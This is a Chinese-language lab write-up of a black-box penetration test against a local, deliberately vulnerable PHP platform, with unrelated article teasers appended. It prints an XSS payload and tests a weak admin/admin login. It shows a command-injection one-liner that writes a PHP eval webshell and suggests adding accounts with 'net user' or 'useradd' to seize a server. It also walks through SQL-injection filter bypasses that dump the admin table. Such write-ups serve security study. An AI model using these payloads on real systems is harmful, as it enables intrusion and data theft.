AVDemo漏洞平臺黑盒測試

信息收集


說明一下:
因為是本地的環境,端口這些就不掃描了,

還有這個是某個dalao寫的平臺,也就檢測不到什么cms了,

信息收集,端口,cms這些是必做的,

首先,這里先簡單的使用輕量級掃描器掃描一下看看

images


可以看到掃描到了用戶注冊、用戶登錄、管理員登錄等等,

還有一些302重定向,說明存在admin這個目錄 ,

還有一些403無權限訪問,也說明網站存在這些目錄。


前臺XSS

前臺搜索留言處存在XSS ,

payload:

<script>alert(/xss/)</script>

images


管理員弱口令

管理員后臺:www.xx.com/admin/login

簡單測試 admin ??admin 然后就進去了


后臺命令執行

發現了一個奇怪的頁面 ,

跟DVWA的很像有木有,可以執行命令

images


如果在滲透測試中,我們可以嘗試使用?net user?命令來添加用戶,

Linux下可以使用?useradd?,

要是對方開了遠程桌面,添加用戶直接就拿服務器了,

這里我就不測試了,我們來寫shell看看 ,

命令:

127.0.0.1 && echo ^<?php eval($_POST[cmd]);?^> > D:/phpStudy/PHPTutorial/WWW/VAuditDemo/shell.php

知道網站路徑的話可以寫在那個目錄都行,不過也得看看有沒有訪問權限,

然后直接上菜刀

images


然后菜刀上也經常使用虛擬終端來執行一些命令.

補充: 如果使用 dir 命令來指定某個路徑查看文件,需要使用反斜杠


前臺頭像上傳

注冊一個test的賬號,

然后在頭像上傳處,我們先拿一張普通的jpg文件測試一下,

發現沒有返回什么路徑之類的,審查元素也沒發現什么路徑。

images


然后傳一個?shell.php?文件,發現被攔截了,

images


試了幾個方法還是不行,然后看了處理上傳的代碼,

沒有返回路徑,文件名也挺復雜的,

條件限制沒有什么好的方法,暫時先放棄了,

一般來說上傳的文件一般在upload目錄下,這個正好也在這個目錄,但是文件名挺復雜了,

就先這樣吧!!


前臺sql注入

前臺留言處發現通過id去搜索留言詳情,

images


那么會不會存在注入,來測試一下

首先一個單引號,發現報錯了,

images


輸入?and 1=1?,發現報錯有一個?sqlwaf的詞,判斷存在waf,

應該是吃掉了一些關鍵字,那么?select?,union?等常見的關鍵字應該也不能直接用了,

images


既然?and?被吃了,那來試試?||?,

發現被替換成了空白符,

images


來試試大小寫,發現也過濾了

images


來試試?/**/?編碼,發現報錯了,

感情是被實體化了,

images


再來試試URL編碼?%252f%252a?就是?/**/?的意思,

發現?%百分號被斜杠轉義了,

images


經過多次嘗試后,回到上面?||?被替換成空,那么會不會有機會呢,

果然是可以的,但是超過列數了,

images


來逐漸刪減一下,最后?4?的時候成功爆出顯位,

images


然后來爆一下數據庫,

images


然后想查一下表,發現_?下劃線被轉換了,這個貌似沒有什么好的繞過方法,

images


然后只能試試盲猜了,數據庫一般都有?adminusers表,

發現?adminusers表都存在,但是?users表一般是存在普通用戶的,所有我們直接看admin表,

沒有報錯說明存在

images


然后再去查爆字段,發現連id這個字段都沒有????

最后無奈只能上數據庫去查看,發現id這個字段其實是叫admin_id

下劃線是無法繞的,只能用其他方法,

這里可以使用?*星號,星號在數據庫是代表所有的意思,

但是這里必須要相同數量的字段才能查詢,不然會報錯,

而?admin這個表字段剛好是三個,然后就直接爆出數據了,

images


附1:常見狀態碼

  1. 200 ??OK ??請求成功。一般用于GET與POST請求
  2. 301 ??Moved Permanently ??被請求的資源已永久移動到新位置
  3. 302 ??Found ??臨時移動。與301類似。但請求的資源現在臨時從不同的 URL 響應請求。
  4. 401 ??Unauthorized ??當前請求需要用戶驗證。
  5. 403 ??Forbidden ??服務器理解請求客戶端的請求,但是拒絕執行此請求
  6. 404 ??Not Found ??所請求的資源(網頁)不存在或已被刪除。
  7. 500 ??Internal Server Error ??服務器內部錯誤,無法完成請求
  8. 502 ??Bad Gateway ??作為網關或者代理工作的服務器嘗試執行請求時,從遠程服務器接收到了一個無效的響應
  9. 503 ??Service Unavailable ??由于超載或系統維護,服務器暫時的無法處理客戶端的請求。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/13295.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/13295.shtml
英文地址,請注明出處:http://en.pswp.cn/web/13295.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

web3 ETF軟件開發難點

開發一個涉及到 Web3 ETF&#xff08;Exchange-Traded Fund&#xff0c;交易所交易基金&#xff09;的軟件可能會面臨一些挑戰和難點&#xff0c;特別是在整合 Web3 技術和金融服務方面。以下是一些可能的難點。北京木奇移動技術有限公司&#xff0c;專業的軟件外包開發公司&am…

記一次:mysql統計的CAST函數與json字段中的某個字段

前言&#xff1a;因為需求的問題&#xff0c;會遇到將某個json存入到一個字段中&#xff0c;但在統計的時候&#xff0c;又需要將這個json中的某個字段作為條件來統計&#xff0c;所以整理了一下cast函數和json中某個字段的條件判斷 一、淺談mysql的json 1.1 上例子 SELECTli…

植物大戰僵尸雜交版(含下載方式)

最近時間&#xff0c;一款很火的植物大戰僵尸雜交版火爆出圈&#xff0c;在玩家之間瘋狂擴散。各種奇特的雜交組合讓游戲變得更加有趣。 游戲介紹 植物大戰僵尸雜交版是一款將《植物大戰僵尸》和植物雜交概念結合在一起的獨特塔防策略游戲。它將《植物大戰僵尸》中的植物與進行…

什么是析構函數?

在編程語言C中&#xff0c;析構函數是一個特別重要的組件&#xff0c;它主要負責在對象生命周期結束時釋放資源和執行清理任務。析構函數的正確實現對于資源管理尤為關鍵&#xff0c;尤其是在處理動態分配內存、文件句柄、網絡連接或其他系統資源時。本文將詳細介紹析構函數的基…

Minio 對象存儲 OSS概述

系列文章目錄 第五章 Minio 對象存儲 OSS概述 Minio 對象存儲 OSS概述 系列文章目錄對象存儲 OSS基本概念存儲空間&#xff08;Bucket&#xff09;對象&#xff08;Object&#xff09;ObjectKeyRegion&#xff08;地域&#xff09;Endpoint&#xff08;訪問域名&#xff09;Ac…

C#知識|上位機子窗體嵌入主窗體方法(實例)

哈嘍,你好啊,我是雷工! 上位機開發中,經常會需要將子窗體嵌入到主窗體, 本節練習C#中在主窗體的某個容器中打開子窗體的方法。 01 需求說明 本節練習將【賬號管理】子窗體在主窗體的panelMain容器中打開。 賬號管理子窗體如下: 主窗體的panelMain容器位置如圖: 02 實現…

一次JAVA接口優化記錄

目錄 一次接口優化記錄首先考慮&#xff0c;添加緩存緩存策略方案一&#xff1a;本地緩存方案二&#xff1a;Redis緩存 優化結果原因分析&#xff1a;原因驗證 接口數據分析將響應數據返回大小減少compression壓縮配置完美&#xff08;代指這里的小系統&#xff09; 一次接口優…

CentOS 的常見命令

CentOS 是一種廣泛使用的 Linux 發行版&#xff0c;特別在服務器環境中。本文將詳細介紹 CentOS 中常見的命令&#xff0c;以便幫助用戶在操作系統中有效地進行各種操作。下面介紹一下文件和目錄操作、用戶和權限管理、系統信息查看、軟件包管理以及網絡配置等方面的命令。 一…

應用層協議【HTTP和HTTPS】

1.概念 1.1 協議 協議是指在計算機通信和網絡通信中&#xff0c;為了實現數據交換而建立的一套規則、約定或者標準。它定義了通信雙方之間的通信格式、傳輸方式、數據的含義、錯誤處理等細節&#xff0c;從而確保通信的可靠性、有效性和安全性。 >1在計算機網絡中&#x…

Python簡易圖書管理系統重構

在本篇課文中&#xff0c;我們將使用Python語言結合MySQL數據庫&#xff0c;從零開始構建一個簡單的圖書管理系統。該系統旨在幫助圖書館管理員輕松管理圖書的借閱、歸還以及查詢圖書信息等日常操作。我們將分步介紹需求分析、數據庫設計、環境搭建、功能實現等關鍵環節&#x…

注冊講堂 | 體外診斷試劑分類目錄的變化

5月11日&#xff0c;千呼萬喚的《體外診斷試劑分類目錄》&#xff08;2024年第58號&#xff09;終于發布&#xff01; 前世今生 2013年&#xff1a;《6840 體外診斷試劑分類子目錄&#xff08;2013版&#xff09;》&#xff08;以下簡稱2013版目錄&#xff09; 2017年&#xff…

蘋果永久版安裝PD虛擬機:Parallels Desktop 19 一鍵激活版

Parallels Desktop 19是一款功能強大的虛擬機軟件&#xff0c;專為Mac用戶設計&#xff0c;允許用戶在同一臺Mac電腦上同時運行Windows、Linux等多個操作系統&#xff0c;而無需額外的硬件設備。 下載地址&#xff1a;https://www.macz.com/mac/9581.html?idOTI2NjQ5Jl8mMjcuM…

Kubernetes入門:核心概念

集群架構與組件 一個kubernetes集群主要是由控制節點(master)、工作節點(node)構成&#xff0c;每個節點上都會安裝不同的組件。 master&#xff1a;集群的控制平面&#xff0c;負責集群的決策 ( 管理 ) api-server : 資源操作的唯一入口&#xff0c;接收用戶輸入的命令&…

vue3 項目中 前端實現下載模板 csv文件

做項目時遇到讓前端實現模板下載功能&#xff0c;第一次碰到這種需求&#xff0c;記錄一下。 下載csv 模板&#xff1a; <el-button type"primary" click"download(data/CSVXX.csv)">下載模板</el-button> const download (url) > {con…

文本控件Text Control示例: 將圖像插入 TX 的各種方法

TX Text Control 是一款功能類似于 MS Word 的文字處理控件&#xff0c;包括文檔創建、編輯、打印、郵件合并、格式轉換、拆分合并、導入導出、批量生成等功能。廣泛應用于企業文檔管理&#xff0c;網站內容發布&#xff0c;電子病歷中病案模板創建、病歷書寫、修改歷史、連續打…

在Linux上面部署ELK

注明&#xff1a;一下的軟件需要自己準備 一、準備環境&#xff1a; 1.兩臺elasticsearch主機4G內存 2.兩臺elasticsearch配置主機名node1和node2(可以省略) #vim /etc/hostname #reboot 3. 兩臺elasticsearch配置hosts文件 #vim /etc/hosts 192.168.1.1 node1 192…

RTMP低延遲推流

人總是需要壓力才能進步, 最近有個項目, 需要我在RK3568上, 推流到公網, 最大程度的降低延遲. 廢話不多說, 先直接看效果: 數據經過WiFi發送到Inenter的SRS服務器, 再通過網頁拉流的. 因為是打金任務, 所以逼了自己一把, 把RTMP推流好好捋一遍. 先說說任務目標, 首先是MPP編碼…

【Altium】AD-檢查原理圖中元器件未連接的Passive Pin

1、 文檔目標 如何讓原理圖編譯時找出元器件上未連接的Passive Pin 2、 問題場景 當引腳屬性&#xff08;Pin type&#xff09;為passive時&#xff0c;原理圖編譯的默認規則是不會去檢查它們是否有連接的。在實際設計過程中&#xff0c;經常會有導線虛連&#xff0c;漏連的事…

醫療傳感器種類不斷增多 市場規模逐漸擴大

醫療傳感器種類不斷增多 市場規模逐漸擴大 醫療傳感器是將人體的生理信息轉換為電信息的變換裝置。醫療傳感器具有高靈敏度、高精度、實時監測等優點&#xff0c;可以檢測佩戴者的心率、呼吸頻率、活動量等&#xff0c;從而更加準確地了解身體情況。   經過多年發展&#…